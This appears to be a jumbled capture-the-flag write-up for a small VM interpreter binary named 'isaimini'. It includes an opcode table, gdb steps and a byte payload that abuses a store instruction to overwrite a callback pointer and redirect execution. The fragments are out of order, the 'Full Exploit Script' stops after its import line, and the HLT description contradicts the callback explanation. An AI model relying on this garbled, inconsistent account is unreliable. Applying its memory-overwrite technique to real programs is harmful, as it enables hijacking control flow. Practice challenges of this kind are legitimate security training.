Success! If the real binary prints the flag, you will see it after Success! . (gdb) file isaimini.6 (gdb) set disassembly-flavor intel (gdb) break *0x00401430 # break at start of execute() (gdb) run (gdb) x/4gx $rsp # view saved RIP after HLT (gdb) x/gx 0x00603010 # examine callback after ST (gdb) continue You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10 . When the interpreter reaches the final if(callback) check, it jumps to that address and prints the success message. 8. Full Exploit Script (Python / pwntools) #!/usr/bin/env python3 from pwn import *
uint64_t regs[16]; // r0 … r15 uint64_t pc; // program counter (index into insts[]) All registers are initialised to 0 . The register file is stored in the .bss section at a fixed address (e.g., 0x00602000 ). | Opcode (hex) | Mnemonic | Operands | Description | |--------------|----------|----------|-------------| | 0x01 | MOV Rdst, imm | dst (4 bits) , imm (8 bytes) | regs[dst] = imm | | 0x02 | ADD Rdst, Rsrc | dst (4) , src (4) | regs[dst] += regs[src] | | 0x03 | SUB Rdst, Rsrc | same as ADD | subtraction | | 0x04 | LD Rdst, [Rsrc] | dst (4) , src (4) | regs[dst] = *(uint64_t*)regs[src] | | 0x05 | ST [Rdst], Rsrc | dst (4) , src (4) | *(uint64_t*)regs[dst] = regs[src] | | 0x06 | JMP imm | imm (8 bytes) | pc = imm | | 0x07 | JEQ Rsrc, Rdst, imm | src (4) , dst (4) , imm (8) | if(regs[src]==regs[dst]) pc = imm | | 0x08 | NOP | – | no‑op | | 0x09 | HLT | – | terminate execution (calls puts("Success!") if regs[0]==0xdeadbeef ) | isaimini.6
payload=$(printf '\x01\x01\x10\x1b\x40\x00\x00\x00\x00\x00\x05\x10\x01\x09') # Make the binary executable chmod +x isaimini.6 Success
if (callback != NULL) ((void (*)(void))callback)(); callback is a global 8‑byte variable at 0x00603010 , initialised to 0 . The only way to set it is through the ST instruction (store to memory). (gdb) file isaimini